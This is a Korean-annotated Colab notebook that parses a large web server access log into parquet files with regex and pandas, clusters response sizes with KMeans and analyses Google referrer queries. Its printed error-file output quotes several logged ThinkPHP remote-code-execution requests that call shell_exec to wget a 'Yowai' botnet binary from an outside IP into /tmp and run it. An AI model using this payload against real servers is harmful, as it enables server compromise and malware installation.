<a href="https://colab.research.google.com/github/Haebuk/Python_Machine_Learning/blob/master/logfile_practice.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

[kaggle dataset](https://www.kaggle.com/eliasdabbas/webserver-log-file-analysis)
# 주제 선정 이유
- [네이버 웹툰 개발 챌린지](https://programmers.co.kr/competitions/1472/2021-naver-webtoon-challenge)
- 2차 시험에서 로그 파일을 처리하는 문제가 나옴

# 라이브러리

In [2]:
import pandas as pd
import re
import os
import time
from tqdm import tqdm
# 파일 로드
for path, dir, filenames in os.walk('/content/drive/MyDrive/input/access.log'):
    for filename in filenames:
        logfile = os.path.join(path, filename)
        print(logfile)

/content/drive/MyDrive/input/access.log/access.log


`os.walk(input)`
- path: input
- dir: 폴더 리스트
- files: 파일 리스트

In [ ]:
def search(dirname):
    filenames = os.listdir(dirname)
    for filename in filenames:
        full_filename = os.path.join(dirname, filename)
        ext = os.path.splitext(full_filename)[-1]
        if ext == '.csv':
            print(full_filename)

search('/content/drive/MyDrive/input/')

('/content/drive/MyDrive/input/stage1_sample_submission', '.csv')
/content/drive/MyDrive/input/stage1_sample_submission.csv
('/content/drive/MyDrive/input/stage1_solution', '.csv')
/content/drive/MyDrive/input/stage1_solution.csv
('/content/drive/MyDrive/input/stage1_train_labels', '.csv')
/content/drive/MyDrive/input/stage1_train_labels.csv
('/content/drive/MyDrive/input/stage2_sample_submission_final', '.csv')
/content/drive/MyDrive/input/stage2_sample_submission_final.csv
('/content/drive/MyDrive/input/stage2_test_final', '')
('/content/drive/MyDrive/input/stage1_train', '')
('/content/drive/MyDrive/input/stage1_test', '')
('/content/drive/MyDrive/input/mnist', '')
('/content/drive/MyDrive/input/hymenoptera_data', '')
('/content/drive/MyDrive/input/intel', '')
('/content/drive/MyDrive/input/.ipynb_checkpoints', '')
('/content/drive/MyDrive/input/programmers', '')
('/content/drive/MyDrive/input/dataminingTP', '')
('/content/drive/MyDrive/input/goodbooks10k', '')
('/content/drive/MyDr

- `os.listdir(dirname)`: `dirname`에 위치한 파일 목록 열거
- `os.path.join(dirname, filename)`: `dirname`과 `filename` 경로를 이어줌
- `os.path.splitext`: 파일명을 파일이름과 확장자명 두가지로 나눠줌

# File Check

In [3]:
!ls -lsSh /content/drive/MyDrive/input/access.log/access.log

3.3G -rw------- 1 root root 3.3G Jul 16 01:08 /content/drive/MyDrive/input/access.log/access.log


- 파일의 용량이 3.3G로 큼

In [9]:
!head -n 4 /content/drive/MyDrive/input/access.log/access.log

54.36.149.41 - - [22/Jan/2019:03:56:14 +0330] "GET /filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53 HTTP/1.1" 200 30577 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)" "-"
31.56.96.51 - - [22/Jan/2019:03:56:16 +0330] "GET /image/60844/productModel/200x200 HTTP/1.1" 200 5667 "https://www.zanbil.ir/m/filter/b113" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-"
31.56.96.51 - - [22/Jan/2019:03:56:16 +0330] "GET /image/61474/productModel/200x200 HTTP/1.1" 200 5379 "https://www.zanbil.ir/m/filter/b113" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-"
40.77.167.129 - - [22/Jan/2019:03:56:17 +0330] "GET /image/14925/productModel/100x100 HTTP/1.1" 200 1696 

# Line Parsing

In [4]:
# 정규표현식
regex = '^(?P<client>\S+) - - \[(?P<datetime>[^*]+)\] "(?P<method>[A-Z]+) (?P<request>\S+) HTTP/[0-9.]+" (?P<status>[0-9]{3}) (?P<size>[0-9]+) "(?P<url>\S+)" "(?P<useragent>[^"]*)"'
# 나중에 데이터프레임에 컬럼명으로 쓸 리스트 설정
columns = ['client', 'datetime', 'method', 'request', 'status', 'size', 'url', 'useragent']

## 정규표현식
- `^`: 시작을 나타냄
- `?P<tag>`: 정규표현식에서의 주석같은 느낌. 길어지면 어느 부분을 의미하는지 알기 힘드므로 이를 설명하는 역할
- `\S+`: 공백을 제외한 모든 문자, 뒤의 `+`는 반복을 의미 
- `^(?P<client>\S+)`: 클라이언트로 처리하는 부분은 공백이 아닌 모든 문자임. 
- `[^*]+`: `*`을 제외한 모든 문자
- `[A-Z]`: 알파벳 대문자만 포함 
- `[0-9.]{3}`: 숫자와 `.`만 포함, `{3}`은 문자가 3번 반복됨을 의미 

- 정규표현식을 실시간으로 확인할 수 있는 사이트: https://regexr.com/, 단 태그는 인식 못함  

In [5]:
# parquet_dir 경로 생성
%mkdir parquet_dir

In [6]:
def logs_to_df(logfile, output_dir, errors_file):
    """
    .log파일을 읽어서 .parquet파일로 변환하는 함수
    25만 행마다 .parquet파일로 저장하고 리스트를 초기화하여 메모리절약 시도
    
    Input:
    - logfile: 변환할 로그 파일 
    - output_dir: parquet파일이 저장될 경로
    - errors_file: 에러파일이 저장될 경로

    """
    with open(logfile) as source_file:
        linenumber = 0 # 행 번호
        parsed_lines = [] # 파싱된 로그를 행 별로 저장할 리스트
        for line in tqdm(source_file):
            try:
                log_line = re.findall(regex, line)[0] # 정규표현식을 통한 라인 파싱, [0]을 해야 행 별로 리스트에 저장 가능
                parsed_lines.append(log_line)
                if linenumber % 200000 == 0: # 20만행마다 로그 찍어봄
                    print(log_line)
            except Exception as e: # 예외가 발생한 경우(정규표현식으로 처리하지 못한 경우)
                with open(errors_file, 'at') as errfile: # 에러파일 쓰기(추가)형태로 open
                    print((line, str(e)), file=errfile) # 어떤 line에 무슨에러가 발생했는지 적음
                continue
            linenumber += 1
            if linenumber % 250000 == 0: # 25만행마다 파싱된 리스트를 parquet파일로 저장
                df = pd.DataFrame(parsed_lines, columns=columns)
                df.to_parquet(f'{output_dir}/file_{linenumber}.parquet')
                parsed_lines.clear() # 메모리 절약을 위해 리스트 초기화
        else: # 마지막 로그가 25만행이 안 될 경우(모자랄 경우)
            df = pd.DataFrame(parsed_lines, columns=columns) 
            df.to_parquet(f'{output_dir}/file_{linenumber}.parquet') # 남는 라인을 parquet파일로 저장
            parsed_lines.clear() # 메모리 절약을 위해 리스트 초기화


In [10]:
%time logs_to_df(logfile=logfile, output_dir='parquet_dir', errors_file='errors.txt')

0it [00:00, ?it/s]

('54.36.149.41', '22/Jan/2019:03:56:14 +0330', 'GET', '/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53', '200', '30577', '-', 'Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)')


214573it [00:03, 105573.03it/s]

('5.211.161.138', '22/Jan/2019:09:03:17 +0330', 'GET', '/image/54258/productModel/150x150', '200', '3811', 'https://www.zanbil.ir/m/product/26784/54745/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D9%84%D8%A8%D8%A7%D8%B3%D8%B4%D9%88%DB%8C%DB%8C-%D8%AF%D8%B1%D8%A8-%D8%A7%D8%B2-%D8%AC%D9%84%D9%88-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-B1253-W', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1')


412961it [00:06, 107099.56it/s]

...

('2.178.168.181', '26/Jan/2019:17:52:28 +0330', 'GET', '/image/57553/productModel/150x150', '200', '3632', 'https://www.zanbil.ir/filter/p6%2Cb2%2Cstexists', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


10218409it [02:22, 94747.29it/s]

('151.241.203.59', '26/Jan/2019:19:18:42 +0330', 'GET', '/image/8868/specialSale?role=e2', '200', '11', 'https://www.zanbil.ir/filter/b32', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


10365152it [02:24, 71605.74it/s]


CPU times: user 2min 5s, sys: 8.62 s, total: 2min 13s
Wall time: 2min 25s


## Error File Check

In [11]:
!wc errors.txt

   314   7867 236189 errors.txt


In [13]:
with open('errors.txt') as err:
    for e in err:
        print(e)

('178.47.232.191 - - [22/Jan/2019:04:54:22 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list index out of range')

('188.19.139.184 - - [22/Jan/2019:06:06:53 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list index out of range')

('42.112.163.67 - - [22/Jan/2019:06:36:36 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list 

- 314개의 정규표현식에 맞지 않는 line이 있음
- 따로 처리하진 않음

# Parquet File Check

In [14]:
%time logs_df = pd.read_parquet('parquet_dir/')

CPU times: user 12.5 s, sys: 4.08 s, total: 16.6 s
Wall time: 11.9 s


In [15]:
!du -sh parquet_dir/

257M	parquet_dir/


- 모든 parquet파일을 읽는데 11.9초가 걸림
- 파일 용량이 3.3G -> 257M로 약 120% 정도 감소

In [17]:
logs_df.info(null_counts=True)

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10364838 entries, 0 to 10364837
Data columns (total 8 columns):
 #   Column     Non-Null Count     Dtype 
---  ------     --------------     ----- 
 0   client     10364838 non-null  object
 1   datetime   10364838 non-null  object
 2   method     10364838 non-null  object
 3   request    10364838 non-null  object
 4   status     10364838 non-null  object
 5   size       10364838 non-null  object
 6   url        10364838 non-null  object
 7   useragent  10364838 non-null  object
dtypes: object(8)
memory usage: 632.6+ MB


- 약 1036만개의 행이 존재
- 메모리는 0.6G정도 사용
- 데이터를 불러왔으므로 이제 `parquet_dir` 경로를 삭제 후 데이터타입을 변경하여 메모리 절약 시도

In [18]:
%rm -r parquet_dir/

In [19]:
logs_df['client'] = logs_df['client'].astype('category')
logs_df['datetime'] = pd.to_datetime(logs_df['datetime'], format='%d/%b/%Y:%H:%M:%S %z')
logs_df['method'] = logs_df['method'].astype('category')
logs_df['size'] = logs_df['size'].astype('int32')
logs_df['status'] = logs_df['status'].astype('int32')
logs_df['url'] = logs_df['url'].astype('category')
logs_df['useragent'] = logs_df['useragent'].astype('category')

In [20]:
logs_df.info(null_counts=True)

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10364838 entries, 0 to 10364837
Data columns (total 8 columns):
 #   Column     Non-Null Count     Dtype                                
---  ------     --------------     -----                                
 0   client     10364838 non-null  category                             
 1   datetime   10364838 non-null  datetime64[ns, pytz.FixedOffset(210)]
 2   method     10364838 non-null  category                             
 3   request    10364838 non-null  object                               
 4   status     10364838 non-null  int32                                
 5   size       10364838 non-null  int32                                
 6   url        10364838 non-null  category                             
 7   useragent  10364838 non-null  category                             
dtypes: category(4), datetime64[ns, pytz.FixedOffset(210)](1), int32(2), object(1)
memory usage: 365.2+ MB


- 데이터프레임에 할당된 메모리가 절반정도 감소

In [21]:
%time logs_df.to_parquet('logs_df.parquet')

CPU times: user 5.3 s, sys: 1.34 s, total: 6.63 s
Wall time: 6.38 s


- 이를 최종 parquet 파일로 저장

In [22]:
!ls -lshS

total 258M
258M -rw-r--r-- 1 root root 258M Jul 19 06:16 logs_df.parquet
236K -rw-r--r-- 1 root root 231K Jul 19 05:56 errors.txt
4.0K drwx------ 6 root root 4.0K Jul 19 05:25 drive
4.0K drwxr-xr-x 1 root root 4.0K Jul 15 13:38 sample_data


In [23]:
%time logs_df = pd.read_parquet('logs_df.parquet')

CPU times: user 5.41 s, sys: 1.63 s, total: 7.04 s
Wall time: 5.66 s


- 11.9초 -> 5.66 약 절반정도 감소

## Logfile Dataframe

In [26]:
logs_df.shape

(10364838, 8)

In [27]:
logs_df

,client,datetime,method,request,status,size,url,useragent
0,37.152.163.59,2019-01-22 12:38:27+03:30,GET,/static/images/loading.gif,200,7370,https://www.zanbil.ir/product/29314/%DA%A9%D8%...,Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7....
1,77.245.233.52,2019-01-22 12:38:27+03:30,GET,/image/11082/productType/240x180,200,12458,https://www.zanbil.ir/browse/sports/%D8%AA%D8%...,Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
2,37.27.128.139,2019-01-22 12:38:27+03:30,GET,/browse/Tablet-Arm-Chair/%D8%B5%D9%86%D8%AF%D9...,200,30604,https://www.zanbil.ir/browse/Classroom-Furnitu...,Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.3...
3,77.245.233.52,2019-01-22 12:38:27+03:30,GET,/image/851/mainSlide,200,89859,https://www.zanbil.ir/browse/sports/%D8%AA%D8%...,Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
4,77.245.233.52,2019-01-22 12:38:27+03:30,GET,/image/848/mainSlide,200,93168,https://www.zanbil.ir/browse/sports/%D8%AA%D8%...,Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
...,...,...,...,...,...,...,...,...
10364833,86.104.110.254,2019-01-26 16:01:31+03:30,GET,/image/64832/productModel/200x200,200,8667,https://www.zanbil.ir/m/browse/tv/%D8%AA%D9%84...,Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like M...
10364834,65.49.68.192,2019-01-26 16:01:31+03:30,GET,/image/64913/productModel/150x150,200,4395,https://www.zanbil.ir/browse/audio-and-video-e...,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:6...
10364835,65.49.68.192,2019-01-26 16:01:31+03:30,GET,/image/64802/productModel/150x150,200,4490,https://www.zanbil.ir/browse/audio-and-video-e...,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:6...
10364836,46.209.107.210,2019-01-26 16:01:31+03:30,GET,/image/%7B%7BbasketItem.id%7D%7D?type=productM...,200,5,https://www.zanbil.ir/,Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.3...


## Analysis

In [ ]:
from sklearn.cluster import KMeans
k = 5
kmeans = KMeans(k)

- Kmeans Clustering을 사용하여 여러 기술통계량을 살펴봄

### size

In [29]:
%time kmeans.fit(logs_df[['size']])

CPU times: user 1min 12s, sys: 2.66 s, total: 1min 15s
Wall time: 1min 14s


KMeans(algorithm='auto', copy_x=True, init='k-means++', max_iter=300,
       n_clusters=5, n_init=10, n_jobs=None, precompute_distances='auto',
       random_state=None, tol=0.0001, verbose=0)

In [30]:
sorted(kmeans.cluster_centers_.round(0).flatten())

[3576.0, 27714.0, 73821.0, 191105.0, 549767.0]

In [31]:
cluster_df = logs_df.groupby(kmeans.labels_)['size'].describe().sort_values('mean').reset_index(drop=True)

In [34]:
cluster_df.style.background_gradient(subset=['count'], cmap='cividis')\
.format({'mean': '{:,.0f}','count': '{:,.0f}'})

,count,mean,std,min,25%,50%,75%,max
0,"8,021,216","3,576",3149.960227,0.000000,1255.000000,2957.000000,4859.000000,15645.000000
1,"1,835,017","27,716",9352.183936,15646.000000,18857.000000,27895.000000,36413.000000,50767.000000
2,"442,390","73,831",17197.467649,50773.000000,62733.000000,68387.000000,88235.000000,132462.000000
3,"55,040","191,115",37640.043707,132474.000000,185207.000000,185207.000000,185207.000000,369714.000000
4,"11,175","549,767",61034.302149,374927.000000,538707.500000,549145.000000,567604.000000,1249490.000000


- 첫번째 cluster에는 약 8백만개의 line이 있음, 평균 사이즈는 3,576
- 다른 기술통계량에 대해서도 나와있음

In [40]:
import plotly.express as px
fig = px.scatter(cluster_df,
                 x='mean', y='count',
                 size=[5]*len(cluster_df),
                 size_max=15,
                 log_y=True,
                 hover_data=['min', 'max', 'std'],
                 title=f'<b>size 분포 ({k} clusters).\
                 </b><br>각 점은 cluster의 평균 size를 나타냄',
                 labels={'mean': '평균 size (bytes)',
                         'count': '해당 클러스터에 포함된 line 수'},)
fig.data[0].hovertemplate = '<b>Average page size (bytes): %{x:,.0f}</b><br><br>Number of pages in cluster: %{y:,.0f}<br><br>min: %{customdata[0]:,.0f}<br>max: %{customdata[1]:,.0f}<br>std: %{customdata[2]:,.0f}<extra></extra>'
fig.layout.font.size = 14
fig.show()

In [47]:
google_organic = logs_df[logs_df['url'].str.contains('google\.com/search')]['url']
google_organic

1611        https://www.google.com/search?q=%D9%85%D8%A7%D...
1694        https://www.google.com/search?client=ms-androi...
5991        https://www.google.com/search?q=%D9%85%D8%B1%D...
6112        https://www.google.com/search?q=%D9%85%D8%B1%D...
11423       https://www.google.com/search?q=%D9%84%D8%A8%D...
                                  ...                        
10359575    http://www.google.com/search?client=ms-android...
10362765    http://www.google.com/search?source=hp&ei=L1NM...
10363703    https://www.google.com/search?ie=UTF-8&client=...
10364068    http://www.google.com/search?q=%D9%82%DB%8C%D9...
10364780    http://www.google.com/search?q=%D9%82%DB%8C%D9...
Name: url, Length: 6041, dtype: category
Categories (103234, object): ['(null)', '-', '/android-app://com.google.android.gm',
                              '/android-app://com.google.android.googlequick..., ...,
                              'https://znbl.ir/static/images/third-party/foo...,
                         

In [48]:
!pip install advertools -q


     |████████████████████████████████| 276kB 2.9MB/s 
     |████████████████████████████████| 256kB 4.8MB/s 
     |████████████████████████████████| 3.1MB 5.4MB/s 
     |████████████████████████████████| 61kB 6.4MB/s 
     |████████████████████████████████| 71kB 6.1MB/s 
     |████████████████████████████████| 3.2MB 18.8MB/s 
     |████████████████████████████████| 256kB 40.3MB/s 
     |████████████████████████████████| 3.2MB 47.6MB/s 
     |████████████████████████████████| 81kB 8.3MB/s 


In [51]:
import advertools as adv
google_url_df = adv.url_to_df(google_organic)
google_url_df.head()

,url,scheme,netloc,path,query,fragment,dir_1,query_q,query_ie,query_oe,query_client,query_source,query_ei,query_oq,query_gs_l,query_hl,query_safe,query_qsubts,query_sa,query_ved,query_aqs,query_biw,query_bih,query_devloc,query_tbm,query_rls,query_dpr,query_channel,query_gbv,query_rlz,query_prmd,query_tbo,query_fir,query_usg,query_v,query_action,query_chips,query_spell,query_sei,query_tbs,query_sourceid,query_aq,query_dcr,query_start,query_btnG,query_gws_rd,query_espv,query_tch,query_noj,query_gcc,query_ctzn,query_pbx,query_fheit,query_nfpr,query_ludocid,query_entrypoint,query_stick,query_btnK,query_devicelang,query_gfns,query_newwindow,query_gl,query_rf,query_hs,query_affdom,query_domains,query_tel,query_ntyp,query_authuser,query_inlang,query_site
0,https://www.google.com/search?q=ماشین‌ظرفشویی&...,https,www.google.com,/search,q=ماشین‌ظرفشویی&ie=utf-8&oe=utf-8&client=firef...,,search,ماشین‌ظرفشویی,utf-8,utf-8,firefox-b,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,https://www.google.com/search?client=ms-androi...,https,www.google.com,/search,client=ms-android-huawei&source=android-home&s...,,search,لوازم خانگی,NaN,NaN,ms-android-huawei,android-home@@hp,ed5GXNXTNI2YsAfKw7moDA,لوازم,mobile-gws-wiz-hp.1.0.0l3j0i131j0.4406.7377..8...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,https://www.google.com/search?q=مرکز+فروش+سماو...,https,www.google.com,/search,q=مرکز+فروش+سماورهای+پلان+در+مشهد&btnG=&client...,,search,مرکز فروش سماورهای پلان در مشهد,NaN,NaN,ms-android-samsung,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,https://www.google.com/search?q=مرکز+فروش+سماو...,https,www.google.com,/search,q=مرکز+فروش+سماورهای+پلان+در+مشهد&btnG=&client...,,search,مرکز فروش سماورهای پلان در مشهد,NaN,NaN,ms-android-samsung,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,https://www.google.com/search?q=لباسشویی+ال+جی...,https,www.google.com,/search,q=لباسشویی+ال+جی&oq=لباسشویی+ال+جی&gs_l=mobile...,,search,لباسشویی ال جی,NaN,NaN,NaN,NaN,NaN,لباسشویی ال جی,mobile-heirloom-serp.12..0l5.3548.16577.0.4639...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


- url에 어떤 쿼리가 담겨있는지 분석해주는 라이브러리

In [53]:
google_url_df.rename(columns={col: col.replace('query_', '') for col in google_url_df.columns},
                     inplace=True)
google_url_df.head()

,url,scheme,netloc,path,query,fragment,dir_1,q,ie,oe,client,source,ei,oq,gs_l,hl,safe,qsubts,sa,ved,aqs,biw,bih,devloc,tbm,rls,dpr,channel,gbv,rlz,prmd,tbo,fir,usg,v,action,chips,spell,sei,tbs,sourceid,aq,dcr,start,btnG,gws_rd,espv,tch,noj,gcc,ctzn,pbx,fheit,nfpr,ludocid,entrypoint,stick,btnK,devicelang,gfns,newwindow,gl,rf,hs,affdom,domains,tel,ntyp,authuser,inlang,site
0,https://www.google.com/search?q=ماشین‌ظرفشویی&...,https,www.google.com,/search,q=ماشین‌ظرفشویی&ie=utf-8&oe=utf-8&client=firef...,,search,ماشین‌ظرفشویی,utf-8,utf-8,firefox-b,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,https://www.google.com/search?client=ms-androi...,https,www.google.com,/search,client=ms-android-huawei&source=android-home&s...,,search,لوازم خانگی,NaN,NaN,ms-android-huawei,android-home@@hp,ed5GXNXTNI2YsAfKw7moDA,لوازم,mobile-gws-wiz-hp.1.0.0l3j0i131j0.4406.7377..8...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,https://www.google.com/search?q=مرکز+فروش+سماو...,https,www.google.com,/search,q=مرکز+فروش+سماورهای+پلان+در+مشهد&btnG=&client...,,search,مرکز فروش سماورهای پلان در مشهد,NaN,NaN,ms-android-samsung,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,https://www.google.com/search?q=مرکز+فروش+سماو...,https,www.google.com,/search,q=مرکز+فروش+سماورهای+پلان+در+مشهد&btnG=&client...,,search,مرکز فروش سماورهای پلان در مشهد,NaN,NaN,ms-android-samsung,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,https://www.google.com/search?q=لباسشویی+ال+جی...,https,www.google.com,/search,q=لباسشویی+ال+جی&oq=لباسشویی+ال+جی&gs_l=mobile...,,search,لباسشویی ال جی,NaN,NaN,NaN,NaN,NaN,لباسشویی ال جی,mobile-heirloom-serp.12..0l5.3548.16577.0.4639...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


- 컬럼명에 `query_`를 제거

In [55]:
google_url_df.loc[:, 'q':].notna().mean().sort_values(ascending=False)[:30].\
to_frame().rename(columns={0:'%'}).style.format('{:.1%}')


,%
q,99.9%
client,61.3%
oq,36.2%
source,35.6%
oe,28.6%
gs_l,26.5%
ie,26.1%
ei,23.5%
hl,16.5%
sa,13.6%


- 어떤 쿼리가 가장 많았는지 확인